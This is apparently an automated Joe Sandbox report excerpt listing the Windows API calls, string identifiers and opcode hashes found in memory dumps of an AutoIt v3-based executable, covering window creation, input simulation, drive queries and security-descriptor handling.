• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: BlockInput
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                              • Opcode ID: 5db5225defbe9f76c73af5e552352a63c0f5df3cdf417421edbd35e9e50a81f7
                                                                                                                                                                                                                                                                              • Instruction ID: 6f4d0ab87df627e9b07ae641ed511fcf9ba3088f6ef090ab8a1769c7a8c25b7a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5db5225defbe9f76c73af5e552352a63c0f5df3cdf417421edbd35e9e50a81f7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0E092312002085FC710DF69E400956B7D9AFA4760B008429FD4AC7252D674AC408B94
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0075EC95
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: mouse_event
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                              • Opcode ID: 54308259219b4983c45e534d97dec8f6924f7e83b47115ba235d0327036340c8
                                                                                                                                                                                                                                                                              • Instruction ID: a4903bb4165691f97c3c1db49076d3ceb523adef8ebc0cb9eeee6a4170250479
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54308259219b4983c45e534d97dec8f6924f7e83b47115ba235d0327036340c8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17D017B619820169F81C0A3C8B2FEB60A0AA302743F904349F902D5595E4C9DB489231
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0071075E), ref: 00710D4A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                              • Opcode ID: bed7497ba96ecb2a68f78d24776398c7a79277df6ab93925ae4e58e20d462ad8
                                                                                                                                                                                                                                                                              • Instruction ID: a1d9e1271cb6770626b6ff529207ae721b7960933e6f1e3e730fefe67476f382
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bed7497ba96ecb2a68f78d24776398c7a79277df6ab93925ae4e58e20d462ad8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0077358D
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 007735A0
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 007735AF
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 007735CA
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 007735D1
                                                                                                                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00773700
                                                                                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0077370E
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00773755
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00773761
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0077379D
                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007737BF
                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007737D2
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007737DD
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 007737E6
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007737F5
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 007737FE
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00773805
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00773810
                                                                                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00773822
                                                                                                                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00790C04,00000000), ref: 00773838
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00773848
                                                                                                                                                                                                                                                                              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0077386E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0077388D
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007738AF
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00773A9C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                              • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                              • Opcode ID: ea650af1e68617372212a3bd3cbe25d00ef2aaf5c50bcd9c46c45a45f101608c
                                                                                                                                                                                                                                                                              • Instruction ID: d97d5eb28a1357421ce41ad35189b6998608ed96ccc115beb309f4168d83e845
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea650af1e68617372212a3bd3cbe25d00ef2aaf5c50bcd9c46c45a45f101608c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D026C71900209AFDB14DF64CD89EAE7BB9FF48350F14C158F919AB2A1DB78AD01CB64
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?), ref: 006F16B4
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00732B07
                                                                                                                                                                                                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00732B40
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00732F85
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006F1488,?,00000000,?,?,?,?,006F145A,00000000,?), ref: 006F1865
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001053), ref: 00732FC1
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00732FD8
                                                                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00732FEE
                                                                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00732FF9
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                              • String ID: 0$(|$(|$(|
                                                                                                                                                                                                                                                                              • API String ID: 2760611726-3878567830
                                                                                                                                                                                                                                                                              • Opcode ID: d7dd003190fb30186720b9f5c87ca57222e82ed972afab3cf92875304145269a
                                                                                                                                                                                                                                                                              • Instruction ID: 5173fbed66a1f817f375b630178f8c86dc4b66ba5bf297655bbda29dc02f2483
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7dd003190fb30186720b9f5c87ca57222e82ed972afab3cf92875304145269a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33128830204205EFEB25DF14C888BA9B7E2BB45310F28856DF595DB263C739AC83DB95
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0077319B
                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007732C7
                                                                                                                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00773306
                                                                                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00773316
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0077335D
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00773369
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 007733B2
                                                                                                                                                                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007733C1
                                                                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 007733D1
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 007733D5
                                                                                                                                                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 007733E5
                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007733EE
                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 007733F7
                                                                                                                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00773423
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 0077343A
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0077347A
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0077348E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 0077349F
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 007734D4
                                                                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 007734DF
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007734EA
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 007734F4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                              • Opcode ID: d9f7cf2b933b2e3bc0dab83c0c24295cfd622b5d82fd3cc692f4ad0d42882021
                                                                                                                                                                                                                                                                              • Instruction ID: 0306084a324e9807edd526e89da05decf9f9536400703e63db543a4fdcc4c371
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9f7cf2b933b2e3bc0dab83c0c24295cfd622b5d82fd3cc692f4ad0d42882021
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56B14E71A40209AFEB14DFA8CD49FAE7BA9FB49750F108118FA15E72D1D7B8AD00CB54
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00765532
                                                                                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,0078DC30,?,\\.\,0078DCD0), ref: 0076560F
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,0078DC30,?,\\.\,0078DCD0), ref: 0076577B
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                              • Opcode ID: b45c96c4c1931417b6c19078d8dedb3133d69f65379510b477d395c6d2706eaf
                                                                                                                                                                                                                                                                              • Instruction ID: 449705f0b72d722cfc6e0e7c1a39134e10efa5eb4da273a64c03b538056dad96
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b45c96c4c1931417b6c19078d8dedb3133d69f65379510b477d395c6d2706eaf
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A61F570B48909DFC728DF24C995AB877A1EF54750F248069EC07AB291C77DDE01EB51
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006F25F8
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 006F2600
                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006F262B
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 006F2633
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 006F2658
                                                                                                                                                                                                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006F2675
                                                                                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006F2685
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006F26B8
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006F26CC
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 006F26EA
                                                                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 006F2706
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 006F2711
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetCursorPos.USER32(?), ref: 006F19E1
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: ScreenToClient.USER32(00000000,?), ref: 006F19FE
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000001), ref: 006F1A23
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000002), ref: 006F1A3D
                                                                                                                                                                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,006F199C), ref: 006F2738
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                              • String ID: <)|$<)|$AutoIt v3 GUI$(|$(|$(|
                                                                                                                                                                                                                                                                              • API String ID: 1458621304-1610310851
                                                                                                                                                                                                                                                                              • Opcode ID: 47360be0d3f52ced125e8131b3de3c3695a3254aff447064af97b8fb49adf10b
                                                                                                                                                                                                                                                                              • Instruction ID: ec3aa86e720180149e68bfb4bf3a5a1e31e82243f910f203332b70c92b2538a1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47360be0d3f52ced125e8131b3de3c3695a3254aff447064af97b8fb49adf10b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BB17C3164020ADFDB24DFA8CC59BAD7BB5FB48314F108219FA15AB2D1DB78A841CF55
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00780D81
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00780DBB
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00780E25
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00780E8D
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00780F11
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00780F61
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00780FA0
                                                                                                                                                                                                                                                                                • Part of subcall function 0070FD52: _wcslen.LIBCMT ref: 0070FD5D
                                                                                                                                                                                                                                                                                • Part of subcall function 00752B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00752BA5
                                                                                                                                                                                                                                                                                • Part of subcall function 00752B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00752BD7
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                              • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                              • Opcode ID: 2286bb68aa0ec8757f14832d3b746e5aed31525b791ef2d7d0d7a56d95a6d767
                                                                                                                                                                                                                                                                              • Instruction ID: d143cf9d212efd5d5bba8a6e836f3086581a59c6c5d38c2132c56ccdae68625e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2286bb68aa0ec8757f14832d3b746e5aed31525b791ef2d7d0d7a56d95a6d767
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E1E131248345CFC754EF24C95087AB7E6BF84314B54896CF8969B3A2DB38ED4ACB91
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00751A60
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A6C
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A7B
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A82
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00751A99
                                                                                                                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00751741
                                                                                                                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00751775
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 0075178C
                                                                                                                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 007517C6
                                                                                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007517E2
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 007517F9
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00751801
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00751808
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00751829
                                                                                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00751830
                                                                                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0075185F
                                                                                                                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00751881
                                                                                                                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00751893
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007518BA
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007518C1
